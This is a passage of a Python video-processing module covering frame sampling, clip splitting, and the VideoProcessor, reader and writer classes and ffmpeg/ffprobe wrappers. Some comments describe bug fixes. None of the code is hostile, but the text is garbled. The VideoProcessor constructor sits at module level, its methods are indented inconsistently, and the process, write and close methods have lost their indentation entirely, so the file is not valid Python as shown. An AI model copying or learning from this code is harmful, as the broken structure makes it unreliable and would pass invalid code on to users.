    # `min(num_frames, k)`. The old bound restricted sampling to the first k
    # frames whenever k < num_frames, contradicting the documented "always
    # including the first and last frames" behavior. When k > num_frames,
    # linspace already yields the documented duplicate frames
    #
    frames = [int(round(i)) for i in np.linspace(1, num_frames, k)]

    # Read frames ...
    if is_video:
        # ... from disk
        with FFmpegVideoReader(video_path, frames=frames) as vr:
            imgs_out = [img for img in vr]
    else:
        # ... from tensor
        imgs_out = [imgs[f - 1] for f in frames]

    # Resize frames, if necessary
    if size is not None:
        imgs_out = [etai.resize(img, *size) for img in imgs_out]

    return np.array(imgs_out)
def sliding_window_sample_frames(imgs_or_video_path, k, stride, size=None):
    """Samples clips from the video using a sliding window of the given
    length and stride.

    If k is larger than the number of frames in the video, duplicate frames
    will be included as necessary so that one window of size k can be
    returned.

    Args:
        imgs_or_video_path: can be either the path to the input video or an
            array of frames of size (num_frames, height, width, num_channels)
        k: the size of each window
        stride: the stride for sliding window
        size: an optional (width, height) to resize the sampled frames. By
            default, the native dimensions of the frames are used

    Returns:
        a numpy array of size [XXXX, k, height, width, num_channels]
    """
    is_video = etau.is_str(imgs_or_video_path)
    if is_video:
        video_path = imgs_or_video_path
    else:
        imgs = imgs_or_video_path

    num_frames = get_frame_count(video_path) if is_video else len(imgs)

    # Compute the 1-based frame numbers of each clip
    if k <= num_frames:
        window = np.arange(1, k + 1)
        starts = np.array(list(range(0, num_frames + 1 - k, stride)))
        clip_inds = starts[:, np.newaxis] + window[np.newaxis, :]
    else:
        # Duplicate last frame as necessary to fill one window of size k
        padding = [num_frames] * (k - num_frames)
        clip_inds = np.concatenate(
            (np.arange(1, num_frames + 1), padding)
        )[np.newaxis]

    # Load each unique frame that appears in some clip ...
    imgs_dict = {}
    frames = list(np.unique(clip_inds))
    if is_video:
        # ... from disk
        with FFmpegVideoReader(video_path, frames=frames) as reader:
            for img in reader:
                imgs_dict[reader.frame_number] = img
    else:
        # ... from tensor
        for fn in frames:
            imgs_dict[fn] = imgs[fn - 1]

    # Resize frames, if necessary
    if size is not None:
        imgs_dict = {
            fn: etai.resize(img, *size) for fn, img in iteritems(imgs_dict)
        }

    # Assemble the clips tensor
    clips = [
        np.array([imgs_dict[fn] for fn in inds]) for inds in clip_inds
    ]
    return np.array(clips)
def extract_keyframes(video_path, output_patt=None):
    """Extracts the keyframes from the video.

    Keyframes are a set of video frames that mark the start of a transition,
    and are faster to extract than an arbitrary frame.

    Args:
        video_path: the path to the video
        output_patt: an optional output pattern like "/path/to/frames-%d.png"
            specifying where to write the sampled frames. If omitted, the
            frames are instead returned in an in-memory list

    Returns:
        a list of the keyframes if output_patt is None, and None otherwise
    """
    if not output_patt:
        # Load frames into memory via FFmpegVideoReader
        with FFmpegVideoReader(video_path, keyframes_only=True) as reader:
            return list(reader)

    # Write frames to disk via VideoProcessor
    processor = VideoProcessor(
        video_path, keyframes_only=True, out_images_path=output_patt
    )
    with processor:
        for img in processor:
            processor.write(img)

    return None
def split_video(
    video_path,
    output_patt,
    num_clips=None,
    clip_duration=None,
    clip_size_bytes=None,
):
    """Splits the video into (roughly) equal-sized clips of the specified
    size.

    Exactly one keyword argument should be provided.

    This implementation uses an `ffmpeg` command of the following form::

        ffmpeg \
            -i input.mp4 \
            -c copy -segment_time SS.XXX -f segment -reset_timestamps 1 \
            output-%03d.mp4

    Args:
        video_path: the path to the video
        output_patt: an output pattern like "/path/to/clips-%03d.mp4"
            specifying where to write the output clips
        num_clips: the number of (roughly) equal size clips to break the
            video into
        clip_duration: the (approximate) duration, in seconds, of each clip
            to generate. The last clip may be shorter
        clip_size_bytes: the (approximate) size, in bytes, of each clip to
            generate. The last clip may be smaller
    """
    metadata = VideoMetadata.build_for(video_path)

    # Translate whichever option was provided into a segment time, in seconds
    if clip_size_bytes:
        num_clips = metadata.size_bytes / clip_size_bytes

    if num_clips:
        # Round up to nearest second to ensure that an additional small clip
        # is not created at the end
        segment_time = np.ceil(metadata.duration / num_clips)
    elif clip_duration:
        segment_time = clip_duration
    else:
        raise ValueError("One keyword argument must be provided")

    # Perform the clipping via ffmpeg's segment muxer
    out_opts = [
        "-c:v",
        "copy",
        "-segment_time",
        "%.3f" % segment_time,
        "-f",
        "segment",
        "-reset_timestamps",
        "1",
    ]
    FFmpeg(in_opts=[], out_opts=out_opts).run(video_path, output_patt)
class VideoProcessor(object):
    """Class for reading a video and writing a new video frame-by-frame.

    The typical usage is::

        with VideoProcessor(...) as p:
            for img in p:
                new_img = ...  # process img
                p.write(new_img)
    """
def __init__(
    self,
    inpath,
    frames=None,
    keyframes_only=False,
    in_use_ffmpeg=True,
    out_use_ffmpeg=True,
    out_images_path=None,
    out_video_path=None,
    out_clips_path=None,
    out_fps=None,
    out_size=None,
    out_opts=None,
):
    """Creates a VideoProcessor instance.

    Args:
        inpath: path to the input video. Passed directly to a VideoReader
        frames: an optional range(s) of frames to process. This argument
            is passed directly to VideoReader
        keyframes_only: whether to only extract keyframes when reading the
            video. Can only be set to True when `in_use_ffmpeg=True`. When
            this is True, `frames` is interpreted as keyframe numbers
        in_use_ffmpeg: whether to use FFmpegVideoReader to read input
            videos rather than OpenCVVideoReader
        out_use_ffmpeg: whether to use FFmpegVideoWriter to write output
            videos rather than OpenCVVideoWriter
        out_images_path: a path like "/path/to/frames/%05d.png" with one
            placeholder that specifies where to save frames as individual
            images when the write() method is called. When out_images_path
            is None or "", no images are written
        out_video_path: a path like "/path/to/video.mp4" that specifies
            where to save a single output video that contains all of the
            frames passed to the write() method concatenated together,
            regardless of any potential frame range gaps. When
            out_video_path is None or "", no video is written
        out_clips_path: a path like "/path/to/video/%05d-%05d.mp4" with two
            placeholders that specifies where to save output video clips
            for each frame range when the write() method is called. When
            out_clips_path is None or "", no videos are written
        out_fps: a frame rate for the output video, if any. If the input
            source is a video and fps is None, the same frame rate is used
        out_size: the frame size for the output video, if any. If out_size
            is None, the input frame size is assumed
        out_opts: a list of output video options for FFmpeg. Passed
            directly to FFmpegVideoWriter. Only applicable when
            out_use_ffmpeg = True

    Raises:
        VideoProcessorError: if insufficient options are supplied to
            construct a VideoWriter
    """
    if in_use_ffmpeg:
        self._reader = FFmpegVideoReader(
            inpath, frames=frames, keyframes_only=keyframes_only
        )
    elif keyframes_only:
        raise VideoProcessorError(
            "Must have `in_use_ffmpeg=True` when `keyframes_only=True`"
        )
    else:
        self._reader = OpenCVVideoReader(inpath, frames=frames)

    self._video_clip_writer = None
    self._video_writer = None
    self._write_images = bool(out_images_path)
    self._write_video = bool(out_video_path)
    self._write_clips = bool(out_clips_path)

    self.inpath = inpath
    self.frames = frames
    self.in_use_ffmpeg = in_use_ffmpeg
    self.out_use_ffmpeg = out_use_ffmpeg
    self.out_images_path = out_images_path
    self.out_video_path = out_video_path
    self.out_clips_path = out_clips_path

    if out_fps is not None and out_fps > 0:
        self.out_fps = out_fps
    elif self._reader.frame_rate > 0:
        self.out_fps = self._reader.frame_rate
    else:
        #
        # Bug fix: the original expression was
        # `"..." + "..." % value`. Since `%` binds tighter than `+`, the
        # format was applied to the second literal (which contains no
        # placeholder), so this path raised a TypeError instead of the
        # intended VideoProcessorError message. Implicit string literal
        # concatenation is used here instead
        #
        raise VideoProcessorError(
            "The inferred frame rate '%s' cannot be used. You must "
            "manually specify a frame rate" % str(self._reader.frame_rate)
        )

    self.out_size = out_size if out_size else self._reader.frame_size
    self.out_opts = out_opts

    if self._write_video:
        self._video_writer = self._new_video_writer(self.out_video_path)
    def __enter__(self):
        """Enters the context manager and returns this processor."""
        return self
    def __exit__(self, *args):
        """Exits the context manager, closing the reader and any writers."""
        self.close()
    def __len__(self):
        """The number of frames that will be processed (not necessarily the
        total length of the video).
        """
        return len(self._reader)
    def __iter__(self):
        """Returns an iterator over the frames to be processed."""
        return self
    def __next__(self):
        """Reads and returns the next frame via `process()`."""
        return self.process()
    @property
    def input_frame_size(self):
        """The (width, height) of each input frame, as reported by the
        underlying reader.
        """
        return self._reader.frame_size
    @property
    def output_frame_size(self):
        """The (width, height) of each output frame, as configured at
        construction time.
        """
        return self.out_size
    @property
    def input_frame_rate(self):
        """The input frame rate, as reported by the underlying reader."""
        return self._reader.frame_rate
    @property
    def output_frame_rate(self):
        """The output frame rate, as resolved at construction time."""
        return self.out_fps
    @property
    def frame_number(self):
        """The current frame number, or -1 if no frames have been read."""
        return self._reader.frame_number
    @property
    def frame_range(self):
        """The (first, last) frames for the current range, or (-1, -1) if no
        frames have been read.

        Delegates to the underlying reader.
        """
        return self._reader.frame_range
    @property
    def is_new_frame_range(self):
        """Whether the current frame is the first in a new range."""
        return self._reader.is_new_frame_range
    @property
    def total_frame_count(self):
        """The total number of frames in the input video."""
        return self._reader.total_frame_count
def process(self):
"""Returns the next frame.
Returns:
img: the frame as a numpy array
"""
img = self._reader.read()
if self._write_clips and self._reader.is_new_frame_range:
self._reset_video_clip_writer()
return img
def write(self, img):
"""Appends the image to the output VideoWriter(s).
Args:
img: an numpy array containing the image
"""
if self._write_images:
etai.write(img, self.out_images_path % self._reader.frame_number)
if self._write_video:
self._video_writer.write(img)
if self._write_clips:
self._video_clip_writer.write(img)
def close(self):
"""Closes the video processor."""
self._reader.close()
if self._video_writer is not None:
self._video_writer.close()
if self._video_clip_writer is not None:
self._video_clip_writer.close()
def _reset_video_clip_writer(self):
if self._video_clip_writer is not None:
self._video_clip_writer.close()
outpath = self.out_clips_path % self._reader.frame_range
self._video_clip_writer = self._new_video_writer(outpath)
def _new_video_writer(self, outpath):
if self.out_use_ffmpeg:
return FFmpegVideoWriter(
outpath, self.out_fps, self.out_size, out_opts=self.out_opts
)
return OpenCVVideoWriter(outpath, self.out_fps, self.out_size)
class VideoProcessorError(Exception):
    """Raised when a problem with a VideoProcessor is encountered."""

    pass
class VideoReader(object):
    """Base class for reading videos.

    This class declares the following conventions:

        (a) `VideoReader`s implement the context manager interface. This means
            that models can optionally use context to perform any necessary
            setup and teardown, and so any code that uses a VideoReader
            should use the `with` syntax

        (b) `VideoReader`s support a `reset()` method that allows them to be
            reset back to their first frame, on demand
    """

    def __init__(self, inpath, frames):
        """Initializes a VideoReader base instance.

        Args:
            inpath: the input video path
            frames: one of the following quantities specifying a collection of
                frames to process:
                - None (all frames)
                - "*" (all frames)
                - a string like "1-3,6,8-10"
                - an `eta.core.frameutils.FrameRange` instance
                - an `eta.core.frameutils.FrameRanges` instance
                - an iterable, e.g., [1, 2, 3, 6, 8, 9, 10]. The frames do not
                    need to be in sorted order
        """
        self.inpath = inpath

        # Parse frames
        #
        # NOTE: `total_frame_count` is implemented by subclasses, so the
        # subclass must have opened its stream BEFORE calling this constructor
        if frames is None or frames == "*":
            frames = "1-%d" % self.total_frame_count

        self._ranges = etaf.parse_frame_ranges(frames)
        self.frames = self._ranges.to_human_str()

    def __enter__(self):
        return self

    def __exit__(self, *args):
        self.close()

    def __len__(self):
        # Number of frames that will be read, not the video's total length
        return len(self._ranges)

    def __iter__(self):
        return self

    def __next__(self):
        return self.read()

    def close(self):
        """Closes the VideoReader.

        Subclasses can override this method if necessary.
        """
        pass

    def reset(self):
        """Resets the VideoReader so that the next call to `read()` will return
        the first frame.
        """
        raise NotImplementedError("subclass must implement reset()")

    def _reset(self):
        """Base VideoReader implementation of `reset()`. Subclasses must call
        this method internally within `reset()`.
        """
        self._ranges.reset()

    @property
    def frame_number(self):
        """The current frame number, or -1 if no frames have been read."""
        return self._ranges.frame

    @property
    def frame_range(self):
        """The (first, last) frames for the current range, or (-1, -1) if no
        frames have been read.
        """
        return self._ranges.frame_range

    @property
    def is_new_frame_range(self):
        """Whether the current frame is the first in a new range."""
        return self._ranges.is_new_frame_range

    @property
    def encoding_str(self):
        """The video encoding string."""
        raise NotImplementedError("subclass must implement encoding_str")

    @property
    def frame_size(self):
        """The (width, height) of each frame."""
        raise NotImplementedError("subclass must implement frame_size")

    @property
    def frame_rate(self):
        """The frame rate."""
        raise NotImplementedError("subclass must implement frame_rate")

    @property
    def total_frame_count(self):
        """The total number of frames in the video."""
        raise NotImplementedError("subclass must implement total_frame_count")

    def read(self):
        """Reads the next frame.

        Returns:
            img: the next frame
        """
        raise NotImplementedError("subclass must implement read()")
class VideoReaderError(Exception):
    """Raised when a problem with a VideoReader is encountered."""

    pass
class FFmpegVideoReader(VideoReader):
    """Class for reading video using ffmpeg.

    The input video can be a standalone video file like "/path/to/video.mp4"
    or a directory of frames like "/path/to/frames/%05d.png". This path is
    passed directly to ffmpeg.

    A frames string like "1-5,10-15" can optionally be passed to only read
    certain frame ranges.

    This class uses 1-based indexing for all frame operations.
    """

    def __init__(self, inpath, frames=None, keyframes_only=False):
        """Creates an FFmpegVideoReader instance.

        Args:
            inpath: path to the input video, which can be a standalone video
                file like "/path/to/video.mp4" or a directory of frames like
                "/path/to/frames/%05d.png". This path is passed directly to
                ffmpeg
            frames: one of the following optional quantities specifying a
                collection of frames to process:
                - None (all frames - the default)
                - "*" (all frames)
                - a string like "1-3,6,8-10"
                - an `eta.core.frameutils.FrameRange` instance
                - an `eta.core.frameutils.FrameRanges` instance
                - an iterable, e.g., [1, 2, 3, 6, 8, 9, 10]. The frames do not
                    need to be in sorted order
            keyframes_only: whether to only read keyframes. By default, this
                is False. When this is True, `frames` is interpreted as
                keyframe numbers
        """
        # Parse args
        if keyframes_only:
            in_opts = ["-skip_frame", "nokey", "-vsync", "0"]
        else:
            in_opts = None

        self._stream_info = VideoStreamInfo.build_for(inpath)
        self._ffmpeg = FFmpeg(
            in_opts=in_opts,
            out_opts=[
                "-vsync",
                "0",  # never omit frames
                "-f",
                "image2pipe",  # pipe frames to stdout
                "-vcodec",
                "rawvideo",  # output will be raw video
                "-pix_fmt",
                "rgb24",  # pixel format
            ],
        )
        self._raw_frame = None

        # Open the stream BEFORE calling the base constructor, which may
        # query `total_frame_count`
        self._open_stream(inpath)
        super(FFmpegVideoReader, self).__init__(inpath, frames)

    def close(self):
        """Closes the FFmpegVideoReader."""
        self._ffmpeg.close()

    def reset(self):
        """Resets the FFmpegVideoReader."""
        self.close()
        self._reset()
        self._open_stream(self.inpath)

    @property
    def encoding_str(self):
        """The video encoding string."""
        return self._stream_info.encoding_str

    @property
    def frame_size(self):
        """The (width, height) of each frame."""
        return self._stream_info.frame_size

    @property
    def frame_rate(self):
        """The frame rate."""
        return self._stream_info.frame_rate

    @property
    def total_frame_count(self):
        """The total number of frames in the video, or 0 if it could not be
        determined.
        """
        return self._stream_info.total_frame_count

    def read(self):
        """Reads the next frame.

        If any problem is encountered while reading the frame, a warning is
        logged and a StopIteration is raised. This means that FFmpegVideoReader
        will gracefully fail when malformed videos are encountered.

        Returns:
            img: the next frame

        Raises:
            StopIteration: if there are no more frames to process or the next
                frame could not be read or parsed for any reason
        """
        # Grab every frame between the current position and the next
        # requested frame; only the final grab is decoded
        for _ in range(max(0, self.frame_number), next(self._ranges)):
            if not self._grab():
                logger.warning(
                    "Failed to grab frame %d. Raising StopIteration now",
                    self.frame_number,
                )
                raise StopIteration

        return self._retrieve()

    def _grab(self):
        # Reads one raw rgb24 frame's worth of bytes from ffmpeg's stdout;
        # returns True on success
        try:
            width, height = self.frame_size
            self._raw_frame = self._ffmpeg.read(width * height * 3)
            return True
        except Exception as e:
            logger.warning(e, exc_info=True)
            self._raw_frame = None
            return False

    def _retrieve(self):
        # Stop when ffmpeg returns empty bits. This can happen when the end of
        # the video is reached
        if not self._raw_frame:
            logger.warning(
                "Found empty frame %d. Raising StopIteration now",
                self.frame_number,
            )
            raise StopIteration

        width, height = self.frame_size
        try:
            # BUG FIX: `np.fromstring` is deprecated (and removed in modern
            # numpy) for binary input; `np.frombuffer` is the supported API.
            # The `.copy()` preserves the writable-array behavior that
            # `fromstring` provided, since `frombuffer` returns a read-only
            # view of the bytes
            vec = np.frombuffer(self._raw_frame, dtype="uint8").copy()
            return vec.reshape((height, width, 3))
        except ValueError as e:
            # Possible alternative: return all zeros matrix instead
            # return np.zeros((height, width, 3), dtype="uint8")
            logger.warning(e, exc_info=True)
            logger.warning(
                "Unable to parse frame %d; Raising StopIteration now",
                self.frame_number,
            )
            raise StopIteration

    def _open_stream(self, inpath):
        # "-" output activates ffmpeg's streaming mode so frames can be read
        # from stdout via `read()`
        self._ffmpeg.run(inpath, "-")
        self._raw_frame = None
class SampledFramesVideoReader(VideoReader):
    """Class for reading video stored as sampled frames on disk.

    This class uses 1-based indexing for all frame operations.
    """

    def __init__(self, frames_dir, frames=None):
        """Creates a SampledFramesVideoReader instance.

        Args:
            frames_dir: the path to a directory of frames, which must be
                parseable by `eta.core.utils.parse_dir_pattern()`
            frames: one of the following optional quantities specifying a
                collection of frames to process:
                - None (all frames - the default)
                - "*" (all frames)
                - a string like "1-3,6,8-10"
                - an `eta.core.frameutils.FrameRange` instance
                - an `eta.core.frameutils.FrameRanges` instance
                - an iterable, e.g., [1, 2, 3, 6, 8, 9, 10]. The frames do not
                    need to be in sorted order
        """
        self._frames_dir = None
        self._frames_patt = None
        self._frame_size = None
        self._total_frame_count = None

        # Must happen before the base constructor, which may query
        # `total_frame_count`
        all_frames = self._init_for_frames_dir(frames_dir)
        if frames is None or frames == "*":
            frames = all_frames

        super(SampledFramesVideoReader, self).__init__(frames_dir, frames)

    def reset(self):
        """Resets the SampledFramesVideoReader."""
        self.close()
        self._reset()

    @property
    def encoding_str(self):
        """The video encoding string."""
        return None

    @property
    def frame_size(self):
        """The (width, height) of each frame."""
        return self._frame_size

    @property
    def frame_rate(self):
        """The frame rate."""
        return None

    @property
    def total_frame_count(self):
        """The total number of frames in the video, or 0 if it could not be
        determined.
        """
        return self._total_frame_count

    def read(self):
        """Reads the next frame.

        Returns:
            img: the next frame

        Raises:
            StopIteration: if there are no more frames to process or the next
                frame could not be read or parsed for any reason
        """
        frame_number = next(self._ranges)
        try:
            return etai.read(self._frames_patt % frame_number)
        except Exception:
            # BUG FIX: was a bare `except:`, which would also swallow
            # SystemExit/KeyboardInterrupt; only convert real read failures
            # into StopIteration
            logger.warning(
                "Failed to grab frame %d. Raising StopIteration now",
                frame_number,
            )
            raise StopIteration

    def _init_for_frames_dir(self, frames_dir):
        # Discovers the frame pattern and available frame numbers, and caches
        # the frame size by reading the first frame
        frames_patt, all_frames = etau.parse_dir_pattern(frames_dir)
        if not all_frames:
            raise ValueError("Found no frames in '%s'" % frames_dir)

        img = etai.read(frames_patt % all_frames[0])

        self._frames_dir = frames_dir
        self._frames_patt = frames_patt
        self._frame_size = etai.to_frame_size(img=img)
        self._total_frame_count = all_frames[-1]

        return all_frames
class OpenCVVideoReader(VideoReader):
    """Class for reading video using OpenCV.

    The input video can be a standalone video file like "/path/to/video.mp4"
    or a directory of frames like "/path/to/frames/%05d.png". This path is
    passed directly to cv2.VideoCapture. So, for example, if you specify a
    directory of frames, the frame numbering must start from 0.

    A frames string like "1-5,10-15" can optionally be passed to only read
    certain frame ranges.

    This class uses 1-based indexing for all frame operations.
    """

    def __init__(self, inpath, frames=None):
        """Creates an OpenCVVideoReader instance.

        Args:
            inpath: path to the input video, which can be a standalone video
                file like "/path/to/video.mp4" or a directory of frames like
                "/path/to/frames/%05d.png". This path is passed directly to
                cv2.VideoCapture
            frames: one of the following optional quantities specifying a
                collection of frames to process:
                - None (all frames - the default)
                - "*" (all frames)
                - a string like "1-3,6,8-10"
                - an `eta.core.frameutils.FrameRange` instance
                - an `eta.core.frameutils.FrameRanges` instance
                - an iterable, e.g., [1, 2, 3, 6, 8, 9, 10]. The frames do not
                    need to be in sorted order

        Raises:
            OpenCVVideoReaderError: if the input video could not be opened
        """
        self._cap = None

        # Open the stream BEFORE calling the base constructor, which may
        # query `total_frame_count`
        self._open_stream(inpath)
        super(OpenCVVideoReader, self).__init__(inpath, frames)

    def close(self):
        """Closes the OpenCVVideoReader."""
        if self._cap is not None:
            self._cap.release()
            self._cap = None

    def reset(self):
        """Resets the OpenCVVideoReader."""
        self.close()
        self._reset()
        self._open_stream(self.inpath)

    @property
    def encoding_str(self):
        """Return the video encoding string."""
        try:
            # OpenCV 3
            code = int(self._cap.get(cv2.CAP_PROP_FOURCC))
        except AttributeError:
            # OpenCV 2
            # pylint: disable=no-member
            code = int(self._cap.get(cv2.cv.CV_CAP_PROP_FOURCC))

        return FOURCC.int_to_str(code)

    @property
    def frame_size(self):
        """The (width, height) of each frame."""
        try:
            # OpenCV 3
            return (
                int(self._cap.get(cv2.CAP_PROP_FRAME_WIDTH)),
                int(self._cap.get(cv2.CAP_PROP_FRAME_HEIGHT)),
            )
        except AttributeError:
            # OpenCV 2
            return (
                # pylint: disable=no-member
                int(self._cap.get(cv2.cv.CV_CAP_PROP_FRAME_WIDTH)),
                # pylint: disable=no-member
                int(self._cap.get(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT)),
            )

    @property
    def frame_rate(self):
        """The frame rate."""
        try:
            # OpenCV 3
            return float(self._cap.get(cv2.CAP_PROP_FPS))
        except AttributeError:
            # OpenCV 2
            # pylint: disable=no-member
            return float(self._cap.get(cv2.cv.CV_CAP_PROP_FPS))

    @property
    def total_frame_count(self):
        """The total number of frames in the video."""
        try:
            # OpenCV 3
            return int(self._cap.get(cv2.CAP_PROP_FRAME_COUNT))
        except AttributeError:
            # OpenCV 2
            # pylint: disable=no-member
            return int(self._cap.get(cv2.cv.CV_CAP_PROP_FRAME_COUNT))

    def read(self):
        """Reads the next frame.

        If any problem is encountered while reading the frame, a warning is
        logged and a StopIteration is raised. This means that OpenCVVideoReader
        will gracefully fail when malformed videos are encountered.

        Returns:
            img: the next frame

        Raises:
            StopIteration: if there are no more frames to process or the next
                frame could not be read or parsed for any reason
        """
        # Grab (without decoding) every frame between the current position
        # and the next requested frame; only the final frame is decoded
        for _ in range(max(0, self.frame_number), next(self._ranges)):
            if not self._grab():
                logger.warning(
                    "Failed to grab frame %d. Raising StopIteration now",
                    self.frame_number,
                )
                raise StopIteration

        return self._retrieve()

    def _grab(self):
        # Advances the capture by one frame without decoding it; returns
        # True on success
        try:
            return self._cap.grab()
        except Exception as e:
            logger.warning(e, exc_info=True)
            return False

    def _retrieve(self):
        # Decodes the most recently grabbed frame and converts BGR -> RGB
        try:
            img_bgr = self._cap.retrieve()[1]
            return etai.bgr_to_rgb(img_bgr)
        except Exception as e:
            logger.warning(e, exc_info=True)
            logger.warning(
                "Unable to parse frame %d; Raising StopIteration now",
                self.frame_number,
            )
            raise StopIteration

    def _open_stream(self, inpath):
        self._cap = cv2.VideoCapture(inpath)
        if not self._cap.isOpened():
            raise OpenCVVideoReaderError("Unable to open '%s'" % inpath)
class OpenCVVideoReaderError(VideoReaderError):
    """Raised when a problem with an OpenCVVideoReader is encountered."""

    pass
class VideoWriter(object):
    """Abstract base class for writing videos.

    `VideoWriter`s implement the context manager interface, so any code that
    uses one should prefer the `with` syntax; subclasses may rely on context
    entry/exit for setup and teardown.
    """

    def write(self, img):
        """Appends the image to the output video.

        Args:
            img: a numpy array
        """
        raise NotImplementedError("subclass must implement write()")

    def close(self):
        """Closes the VideoWriter."""
        pass

    def __enter__(self):
        return self

    def __exit__(self, *args):
        self.close()
class VideoWriterError(Exception):
    """Raised when a problem with a VideoWriter is encountered."""

    pass
class FFmpegVideoWriter(VideoWriter):
    """VideoWriter that pipes raw RGB frames into an ffmpeg subprocess."""

    def __init__(self, outpath, fps, size, out_opts=None):
        """Creates an FFmpegVideoWriter instance.

        Args:
            outpath: the output video path. Existing files are overwritten,
                and the directory is created if necessary
            fps: the frame rate
            size: the (width, height) of each frame
            out_opts: an optional list of output options for FFmpeg
        """
        self.outpath = outpath
        self.fps = fps
        self.size = size

        # ffmpeg consumes raw rgb24 frames of the configured size and rate
        # on stdin; the "-" input path activates input-streaming mode
        raw_in_opts = [
            "-f",
            "rawvideo",  # input will be raw video
            "-vcodec",
            "rawvideo",  # input will be raw video
            "-s",
            "%dx%d" % self.size,  # frame size
            "-pix_fmt",
            "rgb24",  # pixel format
            "-r",
            str(self.fps),  # frame rate
        ]
        self._ffmpeg = FFmpeg(in_opts=raw_in_opts, out_opts=out_opts)
        self._ffmpeg.run("-", self.outpath)

    def write(self, img):
        """Appends the image to the output video.

        Args:
            img: a numpy array
        """
        self._ffmpeg.stream(img.tobytes())

    def close(self):
        """Closes the FFmpegVideoWriter."""
        self._ffmpeg.close()
class OpenCVVideoWriter(VideoWriter):
    """Class for writing videos using cv2.VideoWriter.

    Uses the default encoding scheme for the extension of the output path.
    """

    def __init__(self, outpath, fps, size):
        """Creates an OpenCVVideoWriter instance.

        Args:
            outpath: the output video path. Existing files are overwritten,
                and the directory is created if necessary
            fps: the frame rate
            size: the (width, height) of each frame

        Raises:
            OpenCVVideoWriterError: if the writer failed to open
        """
        self.outpath = outpath
        self.fps = fps
        self.size = size
        self._writer = cv2.VideoWriter()

        etau.ensure_path(self.outpath)
        # fourcc of -1 lets OpenCV pick a codec based on the file extension
        self._writer.open(self.outpath, -1, self.fps, self.size, True)
        if not self._writer.isOpened():
            raise OpenCVVideoWriterError("Unable to open '%s'" % self.outpath)

    def write(self, img):
        """Appends the image to the output video.

        Args:
            img: a numpy array
        """
        # cv2 expects BGR channel order
        self._writer.write(etai.rgb_to_bgr(img))

    def close(self):
        """Closes the video writer."""
        # self._writer.release() # warns to use a separate thread
        #
        # NOTE(review): the release is fired on a background thread and never
        # joined, so the file may not be finalized when close() returns
        threading.Thread(target=self._writer.release, args=()).start()
class OpenCVVideoWriterError(VideoWriterError):
    """Raised when a problem with an OpenCVVideoWriter is encountered."""

    pass
class FFprobe(object):
    """Interface for the ffprobe binary."""

    DEFAULT_GLOBAL_OPTS = ["-loglevel", "error"]

    def __init__(self, global_opts=None, opts=None):
        """Creates an FFprobe instance.

        Args:
            global_opts: a list of global options for ffprobe. By default,
                self.DEFAULT_GLOBAL_OPTS is used
            opts: a list of options for ffprobe
        """
        self._global_opts = global_opts or self.DEFAULT_GLOBAL_OPTS
        self._opts = opts or []

        self._args = None
        self._p = None

    @property
    def cmd(self):
        """The last executed ffprobe command string, or None if run() has not
        yet been called.
        """
        return " ".join(self._args) if self._args else None

    def run(self, inpath, decode=False, verbose=False):
        """Run the ffprobe binary with the specified input path.

        Args:
            inpath: the input path
            decode: whether to decode the output bytes into utf-8 strings. By
                default, the raw bytes are returned
            verbose: whether to log the ffprobe command used at INFO level. By
                default, this is False

        Returns:
            out: the stdout from the ffprobe binary

        Raises:
            ExecutableNotFoundError: if the ffprobe binary cannot be found
            ExecutableRuntimeError: if the ffprobe binary raises an error
                during execution
        """
        self._args = (
            ["ffprobe"] + self._global_opts + self._opts + ["-i", inpath]
        )

        if verbose:
            logger.info("Executing '%s'", self.cmd)
        else:
            logger.debug("Executing '%s'", self.cmd)

        try:
            self._p = Popen(self._args, stdout=PIPE, stderr=PIPE)
        except EnvironmentError as e:
            # ENOENT means the ffprobe binary was not found on the PATH
            if e.errno == errno.ENOENT:
                raise etau.ExecutableNotFoundError(exe="ffprobe")

            raise

        out, err = self._p.communicate()
        if self._p.returncode != 0:
            raise etau.ExecutableRuntimeError(self.cmd, err)

        return out.decode("utf-8") if decode else out
class FFmpeg(object):
    """Interface for the ffmpeg binary.

    Example usages:
        # Convert a video to sampled frames
        ffmpeg = FFmpeg()
        ffmpeg.run("/path/to/video.mp4", "/path/to/frames/%05d.png")

        # Resize a video
        ffmpeg = FFmpeg(size=(512, -1))
        ffmpeg.run("/path/to/video.mp4", "/path/to/resized.mp4")

        # Change the frame rate of a video
        ffmpeg = FFmpeg(fps=10)
        ffmpeg.run("/path/to/video.mp4", "/path/to/resampled.mp4")
    """

    DEFAULT_GLOBAL_OPTS = ["-loglevel", "error"]

    DEFAULT_IN_OPTS = ["-vsync", "0"]

    DEFAULT_VIDEO_OUT_OPTS = [
        "-c:v",
        "libx264",
        "-preset",
        "medium",
        "-crf",
        "23",
        "-pix_fmt",
        "yuv420p",
        "-vsync",
        "0",
        "-an",
    ]

    DEFAULT_IMAGES_OUT_OPTS = ["-vsync", "0"]

    def __init__(
        self,
        fps=None,
        size=None,
        scale=None,
        global_opts=None,
        in_opts=None,
        out_opts=None,
    ):
        """Creates an FFmpeg instance.

        Args:
            fps: an optional output frame rate. By default, the native frame
                rate of the input video is used
            size: an optional output (width, height) for each frame. At most
                one dimension can be -1, in which case the aspect ratio is
                preserved
            scale: an optional positive number by which to scale the input
                video (e.g., 0.5 or 2)
            global_opts: an optional list of global options for ffmpeg. By
                default, self.DEFAULT_GLOBAL_OPTS is used
            in_opts: an optional list of input options for ffmpeg, By default,
                self.DEFAULT_IN_OPTS is used
            out_opts: an optional list of output options for ffmpeg. By
                default, self.DEFAULT_VIDEO_OUT_OPTS is used when the output
                path is a video file and self.DEFAULT_IMAGES_OUT_OPTS is used
                when the output path is an image sequence
        """
        self.is_input_streaming = False
        self.is_output_streaming = False

        self._filter_opts = self._gen_filter_opts(fps, size, scale)
        self._global_opts = global_opts or self.DEFAULT_GLOBAL_OPTS
        self._in_opts = in_opts
        self._out_opts = out_opts
        self._args = None
        self._p = None

    def __enter__(self):
        return self

    def __exit__(self, *args):
        self.close()

    @property
    def cmd(self):
        """The last executed ffmpeg command string, or None if run() has not
        yet been called.
        """
        return " ".join(self._args) if self._args else None

    def run(self, inpath, outpath, verbose=False):
        """Run the ffmpeg binary with the specified input/outpath paths.

        Args:
            inpath: the input path. If inpath is "-", input streaming mode is
                activated and data can be passed via the stream() method
            outpath: the output path. Existing files are overwritten, and the
                directory is created if needed. If outpath is "-", output
                streaming mode is activated and data can be read via the
                read() method
            verbose: whether to log the ffmpeg command used at INFO level. By
                default, this is False

        Raises:
            ExecutableNotFoundError: if the ffmpeg binary cannot be found
            ExecutableRuntimeError: if the ffmpeg binary raises an error during
                execution
        """
        self.is_input_streaming = inpath == "-"
